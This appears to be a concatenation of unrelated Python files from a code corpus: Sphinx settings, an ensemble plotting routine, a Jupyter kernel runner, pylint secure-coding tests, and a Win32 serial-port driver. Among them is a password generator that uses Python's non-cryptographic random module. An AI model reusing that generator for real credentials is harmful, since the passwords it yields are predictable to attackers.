# Enable numfig
numfig = True
# -- Options for HTML output ----------------------------------------------
html_theme = "sphinx_rtd_theme"
html_theme_options = {
'collapse_navigation': False,
'display_version': True,
'navigation_depth': 3,
}
html_theme_path = ["_themes", ]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'yodadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
'papersize': 'a4paper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '\DeclareUnicodeCharacter{00A0}{}',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'dawn.tex', 'Dawn Documentation',
'Fabian Thuering, Carlos Osuna and Tobias Wicky\\\\~\\\\ETH Zurich and MeteoSwiss', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = 'pybind11-logo.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for edit_on_github ----------------------------------------------
edit_on_github_project = 'thfabian/dawn'
edit_on_github_branch = 'master'
|
py | 7dfa21a42c4962e01991bccd72d89315398a82d5 | """Plot the chosen field for each ensemble."""
import math
import os
import matplotlib.pyplot as plt
import numpy as np
import cartopy.crs as ccrs
# User-defined libraries
from read_netcdf import read_n_2d_fields
def ens_plots(dir_output, dir_plot, name_outputs, numclus,
field_to_plot, plot_type):
"""Plot the chosen field for each ensemble."""
print('Number of clusters: {0}'.format(numclus))
varname = name_outputs.split("_")[0]
kind = name_outputs.split("_")[-2]
exp = name_outputs.split("_")[-1]
# Reading the netCDF file of N 2Dfields of anomalies, saved by ens_anom.py
namef = os.path.join(dir_output, 'ens_anomalies_{0}.nc'
.format(name_outputs))
vartoplot, varunits, lat, lon = read_n_2d_fields(namef)
print('vartoplot dim: (numens x lat x lon)={0}'.format(vartoplot.shape))
numens = vartoplot.shape[0]
# ____________Load labels
namef = os.path.join(dir_output, 'labels_{0}.txt'.format(name_outputs))
labels = np.loadtxt(namef, dtype=int)
vmi = round_down(np.nanpercentile(vartoplot, 0.1))
vma = round_up(np.nanpercentile(vartoplot, 99.9))
if field_to_plot == 'anomalies':
# compute range colorbar for anomalies
if abs(vmi) < abs(vma):
rangecbarmin = -abs(vma)
rangecbarmax = abs(vma)
else:
rangecbarmin = -abs(vmi)
rangecbarmax = abs(vmi)
else:
# compute range colorbar for climatologies
rangecbarmin = vmi
rangecbarmax = vma
delta = round_down((rangecbarmax - rangecbarmin) / 100)
clevels = np.arange(rangecbarmin, rangecbarmax + delta, delta)
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'DarkOrange', 'grey']
proj = ccrs.PlateCarree()
xpos = int(np.ceil(np.sqrt(numens * 1.6)))
ypos = int(np.ceil(numens / xpos))
fig = plt.figure(figsize=(24, 14))
if min(lon) < 180. < max(lon):
clon = 180.
else:
clon = 0.
for nens in range(numens):
axes = plt.subplot(xpos, ypos, nens + 1,
projection=ccrs.PlateCarree(central_longitude=clon))
axes.set_extent([min(lon), max(lon), min(lat), max(lat)],
crs=ccrs.PlateCarree())
axes.coastlines("110m")
# Plot Data
if field_to_plot == 'anomalies':
map_plot = plt.contourf(lon, lat, vartoplot[nens], clevels,
cmap=plt.cm.RdBu_r,
transform=proj, extend='both')
else:
map_plot = plt.contourf(lon, lat, vartoplot[nens], clevels,
transform=proj, extend='both')
# Add Title
title_obj = plt.title(nens, fontsize=32, fontweight='bold')
for nclus in range(numclus):
if nens in np.where(labels == nclus)[0]:
title_obj.set_backgroundcolor(colors[nclus])
cax = plt.axes([0.1, 0.03, 0.8, 0.03]) # horizontal
cbar = plt.colorbar(map_plot, cax=cax, orientation='horizontal')
cbar.ax.tick_params(labelsize=18)
cbar.set_ticks(np.arange(rangecbarmin, rangecbarmax + delta, delta * 20))
plt.suptitle(exp + ' ' + kind + ' ' + varname + ' ' + field_to_plot +
' (' + varunits + ')', fontsize=45, fontweight='bold')
top = 0.89 # the top of the subplots of the figure
bottom = 0.12 # the bottom of the subplots of the figure
left = 0.02 # the left side of the subplots of the figure
right = 0.98 # the right side of the subplots of the figure
hspace = 0.36 # amount of height reserved for white space between subplots
wspace = 0.14 # amount of width reserved for blank space between subplots
plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top,
wspace=wspace, hspace=hspace)
# plot the selected fields
namef = os.path.join(dir_plot, ('{0}_{1}.' + plot_type)
.format(field_to_plot, name_outputs))
fig.savefig(namef) # bbox_inches='tight')
print('A ', plot_type, ' figure for the selected fields saved in {0}'
.format(dir_plot))
return namef
def round_up(x, sig=2):
"""Round up to a given number of significant digits."""
dig = pow(10., sig - int(math.floor(math.log10(abs(x)))) - 1)
return math.ceil(x * dig) / dig
def round_down(x, sig=2):
"""Round down to a given number of significant digits."""
dig = pow(10., sig - int(math.floor(math.log10(abs(x)))) - 1)
return math.floor(x * dig) / dig
|
py | 7dfa21d52d39354a8caad714a833a72763c2457c | '''
Created on 2017年8月16日
随机密码生产
@author: liliangang
'''
import random
class RandomPassword:
def __init__(self, length=8):
self.factor = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+=-'
self.length = length
def next(self, length=0):
length = length if length > 0 else self.length
array = []
for i in range(length) :
array.append(self.factor[random.randint(0, len(self.factor) - 1)])
return ''.join(array)
if __name__ == '__main__':
for i in range(10) :
print(RandomPassword().next());
|
py | 7dfa2283428e850dbca123dade2a0b8421febba4 | import settings
from app import app
app.run(host='0.0.0.0', debug=settings.DEBUG)
|
py | 7dfa22a5a2de29471f24eabbf8507f3f217d334e | # -*- coding: utf-8 -*-
#
# Copyright (c) 2021-2022, Geoffrey M. Poore
# All rights reserved.
#
# Licensed under the BSD 3-Clause License:
# http://opensource.org/licenses/BSD-3-Clause
#
from __future__ import annotations
import base64
import queue
import re
import time
import pathlib
try:
import jupyter_client
except ImportError:
jupyter_client = None
from .. import util
from .. import message
from ..code_collections import Session
from ..progress import Progress
_ansi_color_escape_code_re = re.compile('\x1b.*?m')
kernel_name_aliases: dict[str, str] = {}
if jupyter_client is not None:
duplicates = set()
for k, v in jupyter_client.kernelspec.KernelSpecManager().get_all_specs().items():
for alias in [k.lower(), v['spec']['display_name'].lower(), v['spec']['language'].lower()]:
if alias in kernel_name_aliases:
duplicates.add(alias)
else:
kernel_name_aliases[alias] = k
for k in duplicates:
del kernel_name_aliases[k]
del duplicates
mime_type_to_file_extension_map: dict[str, str] = {
'image/png': 'png',
'image/jpeg': 'jpg',
'image/svg+xml': 'svg',
'application/pdf': 'pdf',
}
_home_path_re_pattern = re.escape(pathlib.Path('~').expanduser().as_posix()).replace('/', r'[\\/]')
_home_path_re = re.compile(_home_path_re_pattern, re.IGNORECASE)
async def exec(session: Session, *, cache_key_path: pathlib.Path, progress: Progress) -> None:
'''
Execute code from a session with a Jupyter kernel, attach textual output
to the code chunks within the session, and save rich output files.
'''
# https://jupyter-client.readthedocs.io/en/stable/api/client.html
# https://jupyter-client.readthedocs.io/en/stable/messaging.html#messages-on-the-iopub-pub-sub-channel
session.did_exec = True
progress.session_exec_stage_start(session, stage='run')
if jupyter_client is None:
msg = 'Cannot import "jupyter_client" Python module; install it and try again'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
if jupyter_client.version_info < (6, 1):
# Require async support
msg = f'jupyter_client >= 6.1.0 is required; version {jupyter_client.__version__} is installed'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
kernel_name = kernel_name_aliases.get(session.jupyter_kernel.lower())
if kernel_name is None:
msg = f'No Jupyter kernel was found for "{session.jupyter_kernel}"'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
kernel_manager = jupyter_client.AsyncKernelManager(kernel_name=kernel_name)
try:
await kernel_manager.start_kernel()
except jupyter_client.kernelspec.NoSuchKernel:
msg = f'No Jupyter kernel was found for "{session.jupyter_kernel}"'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
except FileNotFoundError:
msg = f'Jupyter kernel for "{session.jupyter_kernel}" has been deleted or corrupted'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
except Exception as e:
msg = f'Failed to start Jupyter kernel for "{session.jupyter_kernel}":\n{e}'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
kernel_client = kernel_manager.client()
kernel_client.start_channels()
try:
await kernel_client.wait_for_ready()
except RuntimeError as e:
kernel_client.stop_channels()
await kernel_manager.shutdown_kernel()
msg = f'Jupyter kernel timed out during setup:\n{e}'
session.errors.append(message.RunConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
try:
kernel_has_errors = False
incomplete_cc_stack = []
for cc in session.code_chunks:
if kernel_has_errors:
break
if cc.output_index != cc.index:
# If incomplete code, accumulate until complete
incomplete_cc_stack.append(cc)
continue
if not incomplete_cc_stack:
progress.chunk_start(session, chunk=cc)
cc_jupyter_id = kernel_client.execute(cc.code)
else:
incomplete_cc_stack.append(cc)
progress.chunk_start(session, chunk=incomplete_cc_stack[0])
cc_jupyter_id = kernel_client.execute('\n'.join(icc.code for icc in incomplete_cc_stack))
deadline = time.monotonic() + session.jupyter_timeout
while True:
try:
kernel_msg = await kernel_client.get_iopub_msg(timeout=max(0, deadline - time.monotonic()))
except queue.Empty:
kernel_msg = (f'Jupyter kernel "{kernel_name}" timed out during execution '
f'(jupyter_timeout = {session.jupyter_timeout} s)')
cc.errors.append(message.RunConfigError(kernel_msg))
kernel_has_errors = True
break
if kernel_msg['parent_header'].get('msg_id') != cc_jupyter_id:
continue
kernel_msg_type = kernel_msg['msg_type']
kernel_msg_content = kernel_msg['content']
if kernel_msg_type == 'status' and kernel_msg_content['execution_state'] == 'idle':
break
if kernel_msg_type in ('display_data', 'execute_result'):
# Rich output
if cc.rich_output is None:
cc.rich_output = []
rich_output_files = {}
rich_output = {'files': rich_output_files, 'data': kernel_msg_content['data']}
for mime_type, data in kernel_msg_content['data'].items():
file_extension = mime_type_to_file_extension_map.get(mime_type)
if file_extension is None:
continue
if 'name' not in cc.options:
file_name = f'''{kernel_name}-{session.name or ''}-{cc.output_index+1:03d}-{len(cc.rich_output)+1:02d}.{file_extension}'''
else:
file_name = f'''{cc.options['name']}-{len(cc.rich_output)+1}.{file_extension}'''
session.files.append(file_name)
ro_path = cache_key_path / file_name
ro_path.write_bytes(base64.b64decode(data))
rich_output_files[mime_type] = ro_path.as_posix()
cc.rich_output.append(rich_output)
rich_output_text = kernel_msg_content['data'].get('text/plain')
if rich_output_text:
progress.chunk_rich_output_text(session, chunk=cc, output=rich_output_text)
if rich_output_files:
progress.chunk_rich_output_files(session, chunk=cc, files=rich_output_files.values())
elif kernel_msg_type == 'stream':
if kernel_msg_content['name'] == 'stdout':
cc.stdout_lines.extend(util.splitlines_lf(kernel_msg_content['text']))
progress.chunk_stdout(session, chunk=cc, output=kernel_msg_content['text'])
elif kernel_msg_content['name'] == 'stderr':
cc.stderr_lines.extend(util.splitlines_lf(_home_path_re.sub('~', kernel_msg_content['text'])))
progress.chunk_stderr(session, chunk=cc, output=kernel_msg_content['text'])
elif kernel_msg_type == 'error':
kernel_msg_text = _ansi_color_escape_code_re.sub('', '\n'.join(kernel_msg_content['traceback']))
kernel_msg_text = _home_path_re.sub('~', kernel_msg_text)
# This is currently treated as a `StderrRunError` and
# stored in `stderr_lines`. For some kernels, it may
# make more sense to use `RunError` or further refine the
# error system.
cc.stderr_lines.extend(util.splitlines_lf(kernel_msg_text))
cc.errors.append(message.StderrRunError(cc.stderr_lines))
kernel_has_errors = True
progress.chunk_stderr(session, chunk=cc, output=kernel_msg_text)
if not incomplete_cc_stack:
progress.chunk_end(session, chunk=cc)
else:
# `progress` only takes first chunk but accounts for all
# chunks that are grouped together
progress.chunk_end(session, chunk=incomplete_cc_stack[0])
incomplete_cc_stack = []
finally:
kernel_client.stop_channels()
await kernel_manager.shutdown_kernel()
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
|
py | 7dfa2463457374242dd37af4a377e32964209567 | # -*- coding: utf-8 -*-
# Copyright 2021 Damien Nguyen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import astroid
import pylint.testutils
import pytest
import pylint_secure_coding_standard as pylint_scs
try:
from pylint.testutils import MessageTest
except ImportError:
from pylint.testutils import Message as MessageTest
class TestSecureCodingStandardChecker(pylint.testutils.CheckerTestCase):
CHECKER_CLASS = pylint_scs.SecureCodingStandardChecker
def test_tempfile_mktemp_ok(self):
import_node1, import_node2, call_node1 = astroid.extract_node(
"""
import tempfile #@
import tempfile as temp #@
tempfile.mkstemp() #@
"""
)
with self.assertNoMessages():
self.checker.visit_import(import_node1)
self.checker.visit_import(import_node2)
self.checker.visit_call(call_node1)
@pytest.mark.parametrize(
's',
('from tempfile import mktemp',),
)
def test_tempfile_mktemp_importfrom(self, s):
node = astroid.extract_node(s + ' #@')
with self.assertAddsMessages(MessageTest(msg_id='replace-mktemp', node=node)):
self.checker.visit_importfrom(node)
@pytest.mark.parametrize(
's',
(
'mktemp()',
'tempfile.mktemp()',
),
)
def test_tempfile_mktemp_call(self, s):
node = astroid.extract_node(s + ' #@')
with self.assertAddsMessages(MessageTest(msg_id='replace-mktemp', node=node)):
self.checker.visit_call(node)
|
py | 7dfa260dc508867dc9837368eef1016186ac36a9 | #! python
#Python Serial Port Extension for Win32, Linux, BSD, Jython
#serial driver for win32
#see __init__.py
#
#(C) 2001-2003 Chris Liechti <[email protected]>
# this is distributed under a free software license, see license.txt
import win32file # The base COM port and file IO functions.
import win32event # We use events and the WaitFor[Single|Multiple]Objects functions.
import win32con # constants.
from serialutil import *
VERSION = "$Revision$".split()[1] #extract CVS version
#from winbase.h. these should realy be in win32con
MS_CTS_ON = 16
MS_DSR_ON = 32
MS_RING_ON = 64
MS_RLSD_ON = 128
def device(portnum):
"""Turn a port number into a device name"""
#the "//./COMx" format is required for devices >= 9
#not all versions of windows seem to support this propperly
#so that the first few ports are used with the DOS device name
if portnum < 9:
return 'COM%d' % (portnum+1) #numbers are transformed to a string
else:
return r'\\.\COM%d' % (portnum+1)
class Serial(SerialBase):
"""Serial port implemenation for Win32. This implemenatation requires a
win32all installation."""
BAUDRATES = (50,75,110,134,150,200,300,600,1200,1800,2400,4800,9600,
19200,38400,57600,115200)
def open(self):
"""Open port with current settings. This may throw a SerialException
if the port cannot be opened."""
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
self.hComPort = None
try:
self.hComPort = win32file.CreateFile(self.portstr,
win32con.GENERIC_READ | win32con.GENERIC_WRITE,
0, # exclusive access
None, # no security
win32con.OPEN_EXISTING,
win32con.FILE_ATTRIBUTE_NORMAL | win32con.FILE_FLAG_OVERLAPPED,
None)
except Exception, msg:
self.hComPort = None #'cause __del__ is called anyway
raise SerialException("could not open port: %s" % msg)
# Setup a 4k buffer
win32file.SetupComm(self.hComPort, 4096, 4096)
#Save original timeout values:
self._orgTimeouts = win32file.GetCommTimeouts(self.hComPort)
self._rtsState = win32file.RTS_CONTROL_ENABLE
self._dtrState = win32file.RTS_CONTROL_ENABLE
self._reconfigurePort()
# Clear buffers:
# Remove anything that was there
win32file.PurgeComm(self.hComPort,
win32file.PURGE_TXCLEAR | win32file.PURGE_TXABORT |
win32file.PURGE_RXCLEAR | win32file.PURGE_RXABORT)
self._overlappedRead = win32file.OVERLAPPED()
self._overlappedRead.hEvent = win32event.CreateEvent(None, 1, 0, None)
self._overlappedWrite = win32file.OVERLAPPED()
#~ self._overlappedWrite.hEvent = win32event.CreateEvent(None, 1, 0, None)
self._overlappedWrite.hEvent = win32event.CreateEvent(None, 0, 0, None)
self._isOpen = True
def _reconfigurePort(self):
"""Set commuication parameters on opened port."""
if not self.hComPort:
raise SerialException("Can only operate on a valid port handle")
#Set Windows timeout values
#timeouts is a tuple with the following items:
#(ReadIntervalTimeout,ReadTotalTimeoutMultiplier,
# ReadTotalTimeoutConstant,WriteTotalTimeoutMultiplier,
# WriteTotalTimeoutConstant)
if self._timeout is None:
timeouts = (0, 0, 0, 0, 0)
elif self._timeout == 0:
timeouts = (win32con.MAXDWORD, 0, 0, 0, 0)
else:
timeouts = (0, 0, int(self._timeout*1000), 0, 0)
if self._writeTimeout is None:
pass
elif self._writeTimeout == 0:
timeouts = timeouts[:-2] + (0, win32con.MAXDWORD)
else:
timeouts = timeouts[:-2] + (0, int(self._writeTimeout*1000))
win32file.SetCommTimeouts(self.hComPort, timeouts)
win32file.SetCommMask(self.hComPort, win32file.EV_ERR)
# Setup the connection info.
# Get state and modify it:
comDCB = win32file.GetCommState(self.hComPort)
comDCB.BaudRate = self._baudrate
if self._bytesize == FIVEBITS:
comDCB.ByteSize = 5
elif self._bytesize == SIXBITS:
comDCB.ByteSize = 6
elif self._bytesize == SEVENBITS:
comDCB.ByteSize = 7
elif self._bytesize == EIGHTBITS:
comDCB.ByteSize = 8
else:
raise ValueError("Unsupported number of data bits: %r" % self._bytesize)
if self._parity == PARITY_NONE:
comDCB.Parity = win32file.NOPARITY
comDCB.fParity = 0 # Dis/Enable Parity Check
elif self._parity == PARITY_EVEN:
comDCB.Parity = win32file.EVENPARITY
comDCB.fParity = 1 # Dis/Enable Parity Check
elif self._parity == PARITY_ODD:
comDCB.Parity = win32file.ODDPARITY
comDCB.fParity = 1 # Dis/Enable Parity Check
else:
raise ValueError("Unsupported parity mode: %r" % self._parity)
if self._stopbits == STOPBITS_ONE:
comDCB.StopBits = win32file.ONESTOPBIT
elif self._stopbits == STOPBITS_TWO:
comDCB.StopBits = win32file.TWOSTOPBITS
else:
raise ValueError("Unsupported number of stop bits: %r" % self._stopbits)
comDCB.fBinary = 1 # Enable Binary Transmission
# Char. w/ Parity-Err are replaced with 0xff (if fErrorChar is set to TRUE)
if self._rtscts:
comDCB.fRtsControl = win32file.RTS_CONTROL_HANDSHAKE
else:
comDCB.fRtsControl = self._rtsState
if self._dsrdtr:
comDCB.fDtrControl = win32file.DTR_CONTROL_HANDSHAKE
else:
comDCB.fDtrControl = self._dtrState
comDCB.fOutxCtsFlow = self._rtscts
comDCB.fOutxDsrFlow = self._dsrdtr
comDCB.fOutX = self._xonxoff
comDCB.fInX = self._xonxoff
comDCB.fNull = 0
comDCB.fErrorChar = 0
comDCB.fAbortOnError = 0
comDCB.XonChar = XON
comDCB.XoffChar = XOFF
try:
win32file.SetCommState(self.hComPort, comDCB)
except win32file.error, e:
raise ValueError("Cannot configure port, some setting was wrong. Original message: %s" % e)
#~ def __del__(self):
#~ self.close()
def close(self):
"""Close port"""
if self._isOpen:
if self.hComPort:
#Restore original timeout values:
win32file.SetCommTimeouts(self.hComPort, self._orgTimeouts)
#Close COM-Port:
win32file.CloseHandle(self.hComPort)
self.hComPort = None
self._isOpen = False
def makeDeviceName(self, port):
return device(port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
flags, comstat = win32file.ClearCommError(self.hComPort)
return comstat.cbInQue
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if not self.hComPort: raise portNotOpenError
if size > 0:
win32event.ResetEvent(self._overlappedRead.hEvent)
flags, comstat = win32file.ClearCommError(self.hComPort)
if self.timeout == 0:
n = min(comstat.cbInQue, size)
if n > 0:
rc, buf = win32file.ReadFile(self.hComPort, win32file.AllocateReadBuffer(n), self._overlappedRead)
win32event.WaitForSingleObject(self._overlappedRead.hEvent, win32event.INFINITE)
read = str(buf)
else:
read = ''
else:
rc, buf = win32file.ReadFile(self.hComPort, win32file.AllocateReadBuffer(size), self._overlappedRead)
n = win32file.GetOverlappedResult(self.hComPort, self._overlappedRead, 1)
read = str(buf[:n])
else:
read = ''
return read
def write(self, s):
"""Output the given string over the serial port."""
if not self.hComPort: raise portNotOpenError
#print repr(s),
if s:
#~ win32event.ResetEvent(self._overlappedWrite.hEvent)
err, n = win32file.WriteFile(self.hComPort, s, self._overlappedWrite)
if err: #will be ERROR_IO_PENDING:
# Wait for the write to complete.
#~ win32event.WaitForSingleObject(self._overlappedWrite.hEvent, win32event.INFINITE)
n = win32file.GetOverlappedResult(self.hComPort, self._overlappedWrite, 1)
if n != len(s):
raise writeTimeoutError
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self.hComPort: raise portNotOpenError
win32file.PurgeComm(self.hComPort, win32file.PURGE_RXCLEAR | win32file.PURGE_RXABORT)
def flushOutput(self):
"""Clear output buffer, aborting the current output and
discarding all that is in the buffer."""
if not self.hComPort: raise portNotOpenError
win32file.PurgeComm(self.hComPort, win32file.PURGE_TXCLEAR | win32file.PURGE_TXABORT)
def sendBreak(self):
"""Send break condition."""
if not self.hComPort: raise portNotOpenError
import time
win32file.SetCommBreak(self.hComPort)
#TODO: how to set the correct duration??
time.sleep(0.020)
win32file.ClearCommBreak(self.hComPort)
def setRTS(self,level=1):
"""Set terminal status line: Request To Send"""
if not self.hComPort: raise portNotOpenError
if level:
self._rtsState = win32file.RTS_CONTROL_ENABLE
win32file.EscapeCommFunction(self.hComPort, win32file.SETRTS)
else:
self._rtsState = win32file.RTS_CONTROL_DISABLE
win32file.EscapeCommFunction(self.hComPort, win32file.CLRRTS)
def setDTR(self,level=1):
"""Set terminal status line: Data Terminal Ready"""
if not self.hComPort: raise portNotOpenError
if level:
self._dtrState = win32file.DTR_CONTROL_ENABLE
win32file.EscapeCommFunction(self.hComPort, win32file.SETDTR)
else:
self._dtrState = win32file.DTR_CONTROL_DISABLE
win32file.EscapeCommFunction(self.hComPort, win32file.CLRDTR)
def getCTS(self):
"""Read terminal status line: Clear To Send"""
if not self.hComPort: raise portNotOpenError
return MS_CTS_ON & win32file.GetCommModemStatus(self.hComPort) != 0
def getDSR(self):
"""Read terminal status line: Data Set Ready"""
if not self.hComPort: raise portNotOpenError
return MS_DSR_ON & win32file.GetCommModemStatus(self.hComPort) != 0
def getRI(self):
"""Read terminal status line: Ring Indicator"""
if not self.hComPort: raise portNotOpenError
return MS_RING_ON & win32file.GetCommModemStatus(self.hComPort) != 0
def getCD(self):
"""Read terminal status line: Carrier Detect"""
if not self.hComPort: raise portNotOpenError
return MS_RLSD_ON & win32file.GetCommModemStatus(self.hComPort) != 0
# - - platform specific - - - -
def setXON(self, level=True):
"""Platform specific - set flow state."""
if not self.hComPort: raise portNotOpenError
if level:
win32file.EscapeCommFunction(self.hComPort, win32file.SETXON)
else:
win32file.EscapeCommFunction(self.hComPort, win32file.SETXOFF)
#Nur Testfunktion!!
if __name__ == '__main__':
print __name__
s = Serial()
print s
s = Serial(0)
print s
s.baudrate = 19200
s.databits = 7
s.close()
s.port = 3
s.open()
print s
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.